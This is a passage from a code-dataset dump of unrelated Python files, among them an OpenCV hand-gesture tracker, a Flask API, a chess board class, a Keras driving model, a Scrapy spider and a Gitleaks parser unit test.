If no ellipse detected, returns 0 for all parameters.\n If annotate, display ellipse in a separate window.\n \"\"\"\n ret, stats, labeled_img = get_connected_components(binary_frame)\n c_x, c_y, MA, ma, angle, frame = 0, 0, 0, 0, 0, binary_frame\n if ret <= 2:\n return c_x, c_y, MA, ma, angle, frame\n if annotate:\n frame = cv2.cvtColor(binary_frame, cv2.COLOR_GRAY2RGB) # Convert back to color.\n try:\n stats_sorted_by_area = stats[np.argsort(stats[:, 4])]\n roi = stats_sorted_by_area[-3][0:4]\n x, y, w, h = roi\n subimg = labeled_img[y:y+h, x:x+w]\n subimg = cv2.cvtColor(subimg, cv2.COLOR_BGR2GRAY)\n contours, _ = cv2.findContours(subimg, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n max_contour = max(contours, key=len)\n (c_x,c_y), (MA,ma), angle = cv2.fitEllipse(max_contour)\n c_x, c_y, MA, ma, angle = round(x + c_x), round(y + c_y), round(MA, 1), round(ma, 1), round(angle, 1)\n\n if annotate:\n if len(max_contour) >= 5:\n ellipseParam = cv2.fitEllipse(max_contour)\n subimg = cv2.cvtColor(subimg, cv2.COLOR_GRAY2RGB)\n subimg = cv2.ellipse(subimg, ellipseParam, (0,max_color,0), 2) # Add green ellipse.\n cv2.circle(frame, (c_x, c_y), 5, [max_color,0,max_color], -1) # Purple center.\n subimg = cv2.resize(subimg, (0,0), fx=3, fy=3)\n add_text_top_left(frame, f\"({c_x}, {c_y}); axes {MA}, {ma}; angle {angle}\")\n add_text_bottom_left(frame, f\"area {round(MA * ma)}; axis ratio {round(ma / MA, 3)}\")\n imshow_smaller(\"ROI 2\", subimg)\n except:\n if annotate:\n add_text_top_left(frame, \"No hand found\")\n return c_x, c_y, MA, ma, angle, frame\n\ndef detect_fingers(binary_frame, annotate=False):\n \"\"\"\n Returns number of fingers, area of hand, center of hand, and the annotated image.\n If no hand can be detected, returns 1 for the finger count and 0 for the other parameters.\n \"\"\"\n contours, _ = cv2.findContours(binary_frame, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n finger_count, area, cX, cY, frame = 1, 0, 0, 0, binary_frame\n if len(contours) <= 1:\n return finger_count, area, cX, cY, frame\n largest_contour = max(contours, key=cv2.contourArea)\n hull = cv2.convexHull(largest_contour, returnPoints = False)\n frame = binary_frame\n if annotate:\n frame = cv2.cvtColor(binary_frame, cv2.COLOR_GRAY2RGB) # Convert back to color.\n cv2.fillPoly(frame, pts=[largest_contour], color=[255,200,100]) # Fill largest contour with light blue.\n # Unless there are no fingers, the actual number is + 1 since we count valleys not fingers.\n # The hull indices refer to largest_contour, so iterate that same contour.\n for cnt in [largest_contour]:\n try:\n defects = cv2.convexityDefects(cnt, hull)\n if defects is not None:\n for i in range(defects.shape[0]):\n s, e, f, d = defects[i,0]\n start = tuple(cnt[s][0])\n end = tuple(cnt[e][0])\n far = tuple(cnt[f][0])\n\n if annotate:\n cv2.line(frame, start, end, [0,max_color,0], 2) # Green convex hull.\n cv2.circle(frame, far, 5, [0,200,max_color], -1) # Orange points.\n\n if is_finger(start, end, far):\n finger_count += 1\n if annotate:\n cv2.circle(frame, far, 4, [0,0,max_color], -1) # Red finger valley.\n\n except cv2.error:\n pass\n M = cv2.moments(largest_contour)\n area = M[\"m00\"]\n cX = round(M[\"m10\"] / area)\n cY = round(M[\"m01\"] / area)\n if annotate:\n cv2.circle(frame, (cX, cY), 5, [max_color,0,max_color], -1) # Purple center.\n add_text_top_left(frame, f\"({cX}, {cY}); {finger_count} fingers; area {area}\")\n return finger_count, area, cX, cY, frame\n\ndef is_finger(start, end, far):\n c_squared = (end[0] - start[0])**2 + (end[1] - start[1])**2\n a_squared = (far[0] - start[0])**2 + (far[1] - start[1])**2\n b_squared = (end[0] - 
far[0])**2 + (end[1] - far[1])**2\n angle = np.arccos((a_squared + b_squared - c_squared ) / (2 * np.sqrt(a_squared * b_squared)))\n return angle <= np.pi / 3\n\n\nwindow_name = \"Hand Gesture Tracking\"\nmax_color = 255\nDETECT_HOLE = True # Used to switch between detecting hole and fingers.\n\nif __name__ == \"__main__\":\n cam = cv2.VideoCapture(0)\n cv2.namedWindow(window_name)\n\n print(\"Starting gesture detection\")\n while True:\n ret, frame = cam.read()\n if not ret:\n print(\"Could not read a frame, exiting\")\n break\n\n skin_mask = hsv_and_ycrcb_mask(frame)\n frame = blur_noise(frame, skin_mask)\n\n if DETECT_HOLE:\n _, binary_frame = threshold_binarize(frame, invert=True)\n frame = detect_hand_ellipse_hole(binary_frame, annotate=True)[-1]\n else:\n _, binary_frame = threshold_binarize(frame, invert=False)\n frame = detect_fingers(binary_frame, annotate=True)[-1]\n\n imshow_smaller(window_name, frame)\n\n k = cv2.waitKey(1) # k is the key pressed.\n if k == 27 or k == 113: # 27, 113 are ascii for escape and q respectively.\n print(\"Received user input, exiting\")\n cv2.destroyAllWindows()\n cam.release()\n break\n\n","sub_path":"tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":8227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"618572523","text":"#!flask/bin/python\nfrom flask import Flask, jsonify, request\nimport sys\n\n# change this in your own code; a little hacky, I know.\nsys.path.insert(0,'')\nfrom challenge import scholarship_selection\n\napp = Flask(__name__)\narrays = []\n\n@app.route('/scholarship_api')\ndef index():\n\treturn \"scholarship arrays: {}\".format(arrays)\n\n@app.route('/scholarship_api/<int:array_id>',methods=['GET'])\ndef answer(array_id):\n\tif not arrays:\n\t\treturn jsonify({'sequence': None, 'total': None})\n\n\tarray = [arr for arr in arrays if arr['id'] == array_id]\n\tanswer = scholarship_selection.scholarship_selection(array[0]['array'])\n\n\treturn jsonify(answer)\n\n@app.route('/scholarship_api', methods=['POST'])\ndef post_array():\n\t\n\tarray = {\n\t'id': arrays[-1]['id'] + 1 if arrays else 0,\n\t'array': request.json['array'],\n\t}\n\tarrays.append(array)\n\treturn jsonify(array), 201\n\nif __name__ == '__main__':\n    app.run(debug=True)","sub_path":"scholarship_api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"460699513","text":"#Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution(object):\n def deleteNode(self, root, key):\n \"\"\"\n :type root: TreeNode\n :type key: int\n :rtype: TreeNode\n \"\"\"\n if root is None:\n return None\n\n # find the correct node\n if root.val > key:\n root.left = self.deleteNode(root.left, key)\n elif root.val < key:\n root.right = self.deleteNode(root.right, key)\n else:\n if root.left is None:\n return root.right\n elif root.right is None:\n return root.left\n \n replace_node = self.findMinLeft(root.right)\n root.val = replace_node.val\n root.right = self.deleteNode(root.right, root.val)\n\n return root\n\n def findMinLeft(self, root):\n if root is None:\n return None\n elif root.left is None:\n return root\n else:\n return self.findMinLeft(root.left)\n\n\nsol = Solution()\ntree = TreeNode(5)\ntree.left = TreeNode(3)\ntree.left.left = TreeNode(2)\ntree.left.right = TreeNode(4)\ntree.right = 
TreeNode(6)\ntree.right.right = TreeNode(7)\n","sub_path":"python/LeetCode/delete_bst_node.py","file_name":"delete_bst_node.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"452507787","text":"import pandas as pd\nimport requests\nimport time\n\ntrial_one_to_one_data = pd.read_csv('trial_mapped_one_nct_10thSept.csv')\nprint(trial_one_to_one_data.shape)\ncite_count_list = list()\npmid_list = list()\nnct_id_list = list()\n\nfor row_id in range(trial_one_to_one_data.shape[0]):\n pmid = trial_one_to_one_data.iloc[row_id, 0]\n nctid = trial_one_to_one_data.iloc[row_id, 1]\n\n if row_id % 20 == 0:\n print(row_id)\n store_db = pd.DataFrame({'pmid': pmid_list, 'cite_count': cite_count_list})\n store_db.to_csv('store_cite_nct_count_10thSept2020.csv', index=False)\n try:\n link = \"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/elink.fcgi?dbfrom=pubmed&linkname=pubmed_pubmed_citedin&id=\"+str(pmid)\n # link = \"https://www.ncbi.nlm.nih.gov/pubmed?linkname=pubmed_pubmed_citedin&from_uid=\" + str(item) + \"&report=uilist&format=tex\"\n # link = \"https://www.ncbi.nlm.nih.gov/pubmed?linkname=pubmed_pubmed_citedin&from_uid=\" + str(item) + \"&report=uilist&format=tex\"\n #print(\"Link:\", link)\n response = requests.get(link)\n #print(response)\n data = response.text\n # The split tag was lost in extraction; '<Link>' is an assumption based on\n # the elink XML, which wraps each citing article in a <Link> element.\n lines = data.split(\"<Link>\")\n #print(data)\n #print(len(lines) - 1)\n cite_count_list.append(len(lines) - 1)\n pmid_list.append(pmid)\n nct_id_list.append(nctid)\n except:\n print(str(pmid), \" citations cannot be retrieved\")\n cite_count_list.append(-1)\n pmid_list.append(pmid)\n nct_id_list.append(nctid)\n continue\n time.sleep(2)\n\ntrial_one_to_one_data = trial_one_to_one_data.assign(citation_count= cite_count_list)\ntrial_one_to_one_data.to_csv('trial_mapped_onetoone_CitationCount_10thSept.csv', index=False)\n","sub_path":"ExtendedRetrieval_Miscellaneous/CitationCountGivenPubMedId_10thSept.py","file_name":"CitationCountGivenPubMedId_10thSept.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"261180511","text":"from pieces import *\nfrom utility import Coord\n\nclass Board():\n def __init__(self):\n # starting new game when init is called\n self.create_standard_board()\n\n self.white_dead = []\n self.black_dead = []\n\n def create_standard_board(self):\n self.width = 8\n self.height = 8\n self.board = [\n [\n Rook(Coord(0, 0), False),\n Horse(Coord(1, 0), False),\n Bishop(Coord(2, 0), False),\n Queen(Coord(3, 0), False),\n King(Coord(4, 0), False),\n Bishop(Coord(5, 0), False),\n Horse(Coord(6, 0), False),\n Rook(Coord(7, 0), False)\n ],\n [\n Pawn(Coord(0, 1), False),\n Pawn(Coord(1, 1), False),\n Pawn(Coord(2, 1), False),\n Pawn(Coord(3, 1), False),\n Pawn(Coord(4, 1), False),\n Pawn(Coord(5, 1), False),\n Pawn(Coord(6, 1), False),\n Pawn(Coord(7, 1), False)\n ],\n [None, None, None, None, None, None, None, None],\n [None, None, None, None, None, None, None, None],\n [None, None, None, None, None, None, None, None],\n [None, None, None, None, None, None, None, None],\n [\n Pawn(Coord(0, 6), True),\n Pawn(Coord(1, 6), True),\n Pawn(Coord(2, 6), True),\n Pawn(Coord(3, 6), True),\n Pawn(Coord(4, 6), True),\n Pawn(Coord(5, 6), True),\n Pawn(Coord(6, 6), True),\n Pawn(Coord(7, 6), True)\n ],\n [\n Rook(Coord(0, 7), True),\n Horse(Coord(1, 7), True),\n Bishop(Coord(2, 7), True),\n Queen(Coord(3, 7), True),\n King(Coord(4, 7), True),\n 
Bishop(Coord(5, 7), True),\n Horse(Coord(6, 7), True),\n Rook(Coord(7, 7), True)\n ]]\n\n def log(self):\n for row in self.board:\n log([p.to_JSON() if p is not None else \"None\" for p in row])\n\n # given a move, return if the move is valid. Will also check if the move\n # is a castle move.\n def validate_move(self, player, move):\n piece = self.board[move.f.y][move.f.x]\n\n # is there a piece there?\n if piece is None:\n return False\n\n # special case: check if the move is the king rook castling\n if isinstance(piece, King):\n piece.is_castle(self.board, move)\n\n # does the player and piece colour match up?\n if (piece.is_white and player == 2) or (not piece.is_white and player == 1):\n return False\n \n # get all possible moves of piece\n moves = piece.possible_moves(self.board)\n\n if move in moves: # valid move\n return True\n \n return False\n\n\n # Assume the move has been validated already\n def make_move(self, player, move):\n # if the move is the king rook castling, do it first\n if move.is_castle:\n if player == 1:\n h = self.height-1\n else:\n h = 0\n self.board[h][self.width-4] = None # set the old king to none\n self.board[h][self.width-1] = None # set the old rook to none\n new_king = King(Coord(self.width-2, h), player == 1) # create new king\n new_king.has_moved = True\n new_rook = Rook(Coord(self.width-3, h), player == 1) # create new rook\n new_rook.has_moved = True\n # place the pieces created above so their has_moved flags are kept\n self.board[h][self.width-2] = new_king\n self.board[h][self.width-3] = new_rook\n return\n\n # if a piece is being eaten, add to correct dead pile\n if self.board[move.t.y][move.t.x] is not None:\n if player == 1:\n self.black_dead.append(self.board[move.t.y][move.t.x])\n else:\n self.white_dead.append(self.board[move.t.y][move.t.x])\n\n # move the piece\n self.board[move.t.y][move.t.x] = self.board[move.f.y][move.f.x]\n self.board[move.f.y][move.f.x] = None\n\n # update the piece's new position\n self.board[move.t.y][move.t.x].update_pos(move.t)\n\n\n # if the piece is a pawn and it hit the other end, it becomes a Queen\n # TODO: Real rules say the player gets to choose the piece it becomes\n if isinstance(self.board[move.t.y][move.t.x], Pawn):\n if player == 1 and move.t.y == 0:\n self.board[move.t.y][move.t.x] = Queen(move.t, True)\n elif player == 2 and move.t.y == self.height - 1:\n self.board[move.t.y][move.t.x] = Queen(move.t, False)\n\n # TODO: Returns true if player one is in checkmate (loses)\n def player_one_in_checkmate(self):\n pass\n\n # TODO: Returns true if player two is in checkmate (loses)\n def player_two_in_checkmate(self):\n pass\n\n # TODO: Returns true if player one is in check (king under attack)\n def player_one_in_check(self):\n pass\n\n # TODO: Returns true if player two is in check (king under attack)\n def player_two_in_check(self):\n pass\n\n def game_over(self):\n for p in self.white_dead:\n if p.name == \"King\":\n return True\n for p in self.black_dead:\n if p.name == \"King\":\n return True\n return False\n\n def possible_moves_JSON(self, flip=False):\n json = []\n for row in self.board:\n t = []\n for piece in row:\n e = []\n if piece is not None:\n moves = piece.possible_moves(self.board)\n for m in moves:\n if flip:\n m.flip(self.height, self.width)\n e.append([m.t.x, m.t.y])\n t.append(e)\n json.append(t)\n if flip:\n json.reverse()\n\n return json\n\n def dead_pieces_JSON(self):\n json = {\n \"white\": [p.to_JSON() for p in self.white_dead],\n \"black\": [p.to_JSON() for p in self.black_dead]\n }\n\n 
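# Shape sketch (illustrative, assuming each Piece.to_JSON() yields a\n # [symbol, is_white] pair as in Board.to_JSON below):\n # {\"white\": [[\"P\", True], ...], \"black\": [[\"Q\", False], ...]}\n 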
return json\n\n\n def to_JSON(self, flip=False):\n json = [[p.to_JSON() if p is not None else [\"N\", False] for p in row] for row in self.board]\n if flip:\n json.reverse()\n\n return json\n","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":6330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"33005580","text":"# USAGE\n# python real_time_object_detection.py --prototxt MobileNetSSD_deploy.prototxt.txt --model MobileNetSSD_deploy.caffemodel\n\n# import the necessary packages\nfrom imutils.video import VideoStream\nfrom imutils.video import FPS\nimport numpy as np\nimport argparse\nimport imutils\nimport time\nimport cv2\nimport requests\nimport os\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--prototxt\", required=True,\n help=\"path to Caffe 'deploy' prototxt file\")\nap.add_argument(\"-m\", \"--model\", required=True,\n help=\"path to Caffe pre-trained model\")\nap.add_argument(\"-c\", \"--confidence\", type=float, default=0.2,\n help=\"minimum probability to filter weak detections\")\nap.add_argument(\"-s\", \"--server\",default=\"http://raspberrypi.local:8000\",\n help=\"raspberry pi to connect to\")\nap.add_argument(\"-v\", \"--visual\",action='store_true',\n help=\"show video feed on screen\")\nargs = vars(ap.parse_args())\n\n# initialize the list of class labels MobileNet SSD was trained to\n# detect, then generate a set of bounding box colors for each class\nCLASSES = [\"background\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\",\n \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\",\n \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\",\n \"sofa\", \"train\", \"tvmonitor\"]\nCOLORS = np.random.uniform(0, 255, size=(len(CLASSES), 3))\n\n# load our serialized model from disk\nprint(\"[INFO] loading model...\")\nnet = cv2.dnn.readNetFromCaffe(args[\"prototxt\"], args[\"model\"])\n\n# initialize the video stream, allow the camera sensor to warmup,\n# and initialize the FPS counter\nprint(\"[INFO] starting video stream...\")\nstream = os.path.join(args['server'],'stream.mjpg')\nvs = VideoStream(stream).start()\ntime.sleep(2.0)\nfps = FPS().start()\n\n# helper: yield every detected person in the current frame's detections\ndef find_people(detections):\n # loop over the detections\n for i in np.arange(0, detections.shape[2]):\n # extract the confidence (i.e., probability) associated with\n # the prediction\n confidence = detections[0, 0, i, 2]\n\n # filter out weak detections by ensuring the `confidence` is\n # greater than the minimum confidence\n if confidence > args[\"confidence\"]:\n # extract the index of the class label from the\n # `detections`, then compute the (x, y)-coordinates of\n # the bounding box for the object\n idx = int(detections[0, 0, i, 1])\n if CLASSES[idx] != 'person':\n continue\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = box.astype(\"int\")\n center = (endX + startX)//2, (endY + startY)//2\n\n if args['visual']:\n # draw the prediction on the frame\n label = \"{}: {:.2f}%\".format(CLASSES[idx],\n confidence * 100)\n cv2.rectangle(frame, (startX, startY), (endX, endY),\n COLORS[idx], 2)\n y = startY - 15 if startY - 15 > 15 else startY + 15\n cv2.putText(frame, label, (startX, y),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[idx], 2)\n\n cv2.circle(frame,center, 10, COLORS[idx])\n height = abs(endY - startY)\n center = {'x': center[0]/w, 'y': 
center[1]/h}\n #requests.get(os.path.join(args['server'],\"pointat\"),params=center)\n yield {'height':height, 'center':center}\n\nmissing_count = 0\nwhile True:\n # grab the frame from the threaded video stream and resize it\n # to have a maximum width of 400 pixels\n frame = vs.read()\n frame = imutils.resize(frame, width=400)\n\n # grab the frame dimensions and convert it to a blob\n (h, w) = frame.shape[:2]\n blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)),\n 0.007843, (300, 300), 127.5)\n\n # pass the blob through the network and obtain the detections and\n # predictions\n net.setInput(blob)\n detections = net.forward()\n try:\n person = max(find_people(detections),key=lambda p:p['height'])\n missing_count = 0\n requests.get(os.path.join(args['server'],\"pointat\"),\n params=person['center'])\n except ValueError:\n missing_count += 1\n if missing_count > 10:\n requests.get(os.path.join(args['server'],\"keeplooking\"))\n\n # show the output frame\n if args['visual']:\n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1) & 0xFF\n\n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n\n # update the FPS counter\n fps.update()\n\n# stop the timer and display FPS information\nfps.stop()\nprint(\"[INFO] elapsed time: {:.2f}\".format(fps.elapsed()))\nprint(\"[INFO] approx. FPS: {:.2f}\".format(fps.fps()))\n\n# do a bit of cleanup\ncv2.destroyAllWindows()\nvs.stop()\n","sub_path":"Klomi-Robot-master/client-server/real_time_object_detection.py","file_name":"real_time_object_detection.py","file_ext":"py","file_size_in_byte":4877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"394396489","text":"from django.test import TestCase\nfrom dojo.tools.gitleaks.parser import GitleaksJSONParser\nfrom dojo.models import Test\n\n\nclass TestGitleaksParser(TestCase):\n\n def test_parse_without_file_has_no_finding(self):\n parser = GitleaksJSONParser(None, Test())\n self.assertEqual(0, len(parser.items))\n\n def test_parse_file_with_one_finding(self):\n testfile = open(\"dojo/unittests/scans/gitleaks/data_one.json\")\n parser = GitleaksJSONParser(testfile, Test())\n self.assertEqual(1, len(parser.items))\n\n def test_parse_file_with_multiple_finding(self):\n testfile = open(\"dojo/unittests/scans/gitleaks/data_many.json\")\n parser = GitleaksJSONParser(testfile, Test())\n self.assertEqual(2, len(parser.items))\n","sub_path":"dojo/unittests/test_gitleaks_parser.py","file_name":"test_gitleaks_parser.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"353096596","text":"import numpy as np\nfrom pyuwds3.types.vector.vector6d import Vector6D\nfrom pyuwds3.types.vector.vector3d import Vector3D\n\n\nclass ObjectPoseEstimator(object):\n def estimate(self, objects, view_matrix, camera_matrix, dist_coeffs):\n \"\"\" \"\"\"\n for o in objects:\n if o.bbox.depth is not None:\n fx = camera_matrix[0][0]\n fy = camera_matrix[1][1]\n cx = camera_matrix[0][2]\n cy = camera_matrix[1][2]\n c = o.bbox.center()\n z = o.bbox.depth\n x = (c.x - cx) * z / fx\n y = (c.y - cy) * z / fy\n sensor_transform = Vector6D(x=x, y=y, z=z).transform()\n world_pose = Vector6D().from_transform(np.dot(view_matrix, sensor_transform))\n position = world_pose.position()\n rotation = Vector3D()\n o.update_pose(position, 
rotation)\n","sub_path":"src/uwds3_perception/estimation/object_pose_estimator.py","file_name":"object_pose_estimator.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"639964908","text":"import csv\nimport cv2\nimport numpy as np\nimport sklearn\n\nfrom keras.models import Sequential\nfrom keras.layers import Flatten, Dense, Lambda, Cropping2D, Dropout\nfrom keras.layers.convolutional import Convolution2D\n\nfrom sklearn.model_selection import train_test_split\n'''\n# Merge all .csv files together\nfile_result = open(\"driving_log_all.csv\",\"a\")\n# First .csv file:\nfor line in open(\"driving_log_0.csv\"):\n file_result.write(line)\n# All other .csv files (10 more, 11 files total): \nfor num in range(1,11):\n file = open(\"driving_log_\"+str(num)+\".csv\")\n for line in file:\n file_result.write(line)\n file.close()\nfile_result.close()\n'''\n# Load data from merged .csv file within working directory\nsamples = []\nwith open('driving_log_all.csv') as csv_file:\n reader = csv.reader(csv_file)\n for line in reader:\n if line[0] == 'center': # Exclude header\n continue\n samples.append(line)\n# Split data in train set (80%) and validation set (20%)\ntrain_samples, validation_samples = train_test_split(samples, test_size=0.2)\n'''\n# Change brightness of image for augmentation purpose\ndef gamma_correction(img, correction):\n img = img/255.0\n img = cv2.pow(img, correction)\n return np.uint8(img*255)\n'''\n# Define generator to load files in batches from directory 'IMG/' when needed, avoid MemoryError\ndef generator(samples, batch_size=64):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n sklearn.utils.shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n\n images = []\n angles = []\n for batch_sample in batch_samples:\n if '\\\\' in batch_sample[0]:\n center_name = 'IMG/'+batch_sample[0].split('\\\\')[-1]\n left_name = 'IMG/'+batch_sample[1].split('\\\\')[-1]\n right_name = 'IMG/'+batch_sample[2].split('\\\\')[-1]\n else: \n center_name = 'IMG/'+batch_sample[0].split('/')[-1]\n left_name = 'IMG/'+batch_sample[1].split('/')[-1]\n right_name = 'IMG/'+batch_sample[2].split('/')[-1]\n left_image = cv2.imread(left_name)\n left_angle = float(batch_sample[3]) + 0.2\n images.append(left_image)\n angles.append(left_angle)\n right_image = cv2.imread(right_name)\n right_angle = float(batch_sample[3]) - 0.2\n images.append(right_image)\n angles.append(right_angle)\n center_image = cv2.imread(center_name)\n center_angle = float(batch_sample[3])\n images.append(center_image)\n angles.append(center_angle)\n images.append(cv2.flip(center_image,1))\n angles.append(center_angle*-1.0) \n #value = np.random.uniform(0.2,1.5)\n #if value > 0.8 and value < 1.1:\n # value -= 0.4\n #img_bright = gamma_correction(center_image, value)\n #images.append(img_bright)\n #angles.append(center_angle)\n\n X_train = np.array(images)\n y_train = np.array(angles)\n yield sklearn.utils.shuffle(X_train, y_train)\n\n# compile and train the model using the generator function\ntrain_generator = generator(train_samples, batch_size=64)\nvalidation_generator = generator(validation_samples, batch_size=64)\n\n# Image format\nrow, col, ch = 160, 320, 3\n\nmodel = Sequential()\n# Preprocess incoming data, centered around zero with small standard deviation \nmodel.add(Lambda(lambda x: x/255.0 - 
0.5, input_shape=(row, col, ch)))\nmodel.add(Cropping2D(cropping=((70,25), (0,0))))\nmodel.add(Convolution2D(24, 5, 5, subsample=(2,2), activation='relu'))\nmodel.add(Convolution2D(36, 5, 5, subsample=(2,2), activation='relu'))\nmodel.add(Convolution2D(48, 5, 5, subsample=(2,2), activation='relu'))\nmodel.add(Convolution2D(64, 3, 3, activation='relu'))\nmodel.add(Convolution2D(64, 3, 3, activation='relu'))\n#model.add(Dropout(0.5))\nmodel.add(Flatten())\nmodel.add(Dense(100))\n#model.add(Dense(250))\n#model.add(Dropout(0.5))\n#model.add(Dense(75))\nmodel.add(Dense(50))\nmodel.add(Dense(10))\nmodel.add(Dense(1))\n\nmodel.compile(loss='mse', optimizer='adam')\nmodel.fit_generator(train_generator, samples_per_epoch= len(train_samples)*4/64,\n validation_data=validation_generator,\n nb_val_samples=len(validation_samples)*4/64, nb_epoch=3)\n# Save model\n#model.save('model_gener.h5')","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"248940961","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.metrics import mean_squared_error as MSE\nfrom sklearn import linear_model\nfrom sklearn.linear_model import Lasso\nfrom sklearn.model_selection import cross_val_score\n\ndef predictive_error(holdout, num_covs, covs_subset, lasso_reg):\n\n\t# Change column names into a pandas Index (object)\n col = list(range(num_covs))\n col.extend([\"outcome\",\"treated\"])\n col = pd.Index(col)\n holdout.columns = col\n\n # Lasso regression models (one for the treated arm, one for control)\n lasso_c = Lasso(alpha=lasso_reg)\n lasso_t = Lasso(alpha=lasso_reg)\n\n holdout_treated = holdout[holdout['treated']==1][covs_subset]\n holdout_control = holdout[holdout['treated']==0][covs_subset]\n\n\n mse_t = np.mean(cross_val_score(lasso_t, holdout_treated,\n holdout[holdout['treated']==1]['outcome'] , scoring = 'neg_mean_squared_error' ) )\n\n\n mse_c = np.mean(cross_val_score(lasso_c, holdout_control,\n holdout[holdout['treated']==0]['outcome'] , scoring = 'neg_mean_squared_error' ) )\n\n\n # NOTE: 'neg_mean_squared_error' scores are negative, so this returns the\n # negated total MSE (closer to zero means a better fit).\n return ((mse_t + mse_c))\n","sub_path":"inst/Lasso.py","file_name":"Lasso.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"361343597","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom sun0769.items import Sun0769Item\n\nclass YgSpider(scrapy.Spider):\n name = 'yg'\n allowed_domains = ['sun0769.com']\n start_urls = ['http://wz.sun0769.com/html/top/reply.shtml']\n\n def parse(self, response):\n tr_list=response.xpath(\"//div[contains(@class,'clearfix')]/table[2]//tr\")\n for tr in tr_list:\n item=Sun0769Item()\n item['title']=tr.xpath('./td[3]/a/@title').get()\n item['page_info']=tr.xpath('./td[@class=\"txt18\"]/a/@href').get()\n item['date']=tr.xpath('./td[6]/text()').get()\n # print(item)\n yield scrapy.Request(url=item['page_info'],callback=self.page_parser,meta={'item':item})\n\n next_page=response.xpath(\"//a[text()='>']/@href\").get()\n if next_page:\n yield scrapy.Request(url=next_page,callback=self.parse)\n\n def page_parser(self,response):\n item=response.meta['item']\n item['content']=response.xpath(\"string(//td[@class='txt16_3'])\").get()\n item['img'] = response.xpath(\"//div[@class='textpic']//img/@src\").get()\n if item['img']:\n item['img']= 'http://wz.sun0769.com/'+item['img']\n yield item\n","sub_path":"scrapy 框架/sun0769/sun0769/spiders/yg.py","file_name":"yg.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"49994290","text":"BLOCK_HEIGHT = 50\nBLOCK_WIDTH = 120\nBLOCK_STEP = 25\nTEXT_LENGTH = 15\n\nstart_x = 245\nstart_y = 100\n\n\ndef calc_x(x):\n return start_x + BLOCK_WIDTH * x\n\n\ndef calc_y(y):\n return start_y + BLOCK_HEIGHT * y + BLOCK_STEP * y\n\n\ndef redraw_chart(flowchart, canvas, func, dialog_factory):\n canvas.delete(\"all\")\n flowchart.recalculate_coords()\n draw_node(canvas, flowchart.start, func, dialog_factory)\n\n\ndef draw_node(canvas, node, func, dialog_factory):\n global start_x\n global start_y\n\n cur_x = calc_x(node.x)\n cur_y = calc_y(node.y)\n\n node_text = get_node_text(node)\n node.draw_func(canvas, cur_x, cur_y, BLOCK_WIDTH, BLOCK_HEIGHT, node_text[:TEXT_LENGTH] +\n (node_text[TEXT_LENGTH:] and '..'), node, func, dialog_factory)\n\n if node.back_link is not None:\n # Draw the arrow back to the start of the loop\n l1 = canvas.create_line(cur_x + BLOCK_WIDTH // 2, cur_y, cur_x + BLOCK_WIDTH +\n 
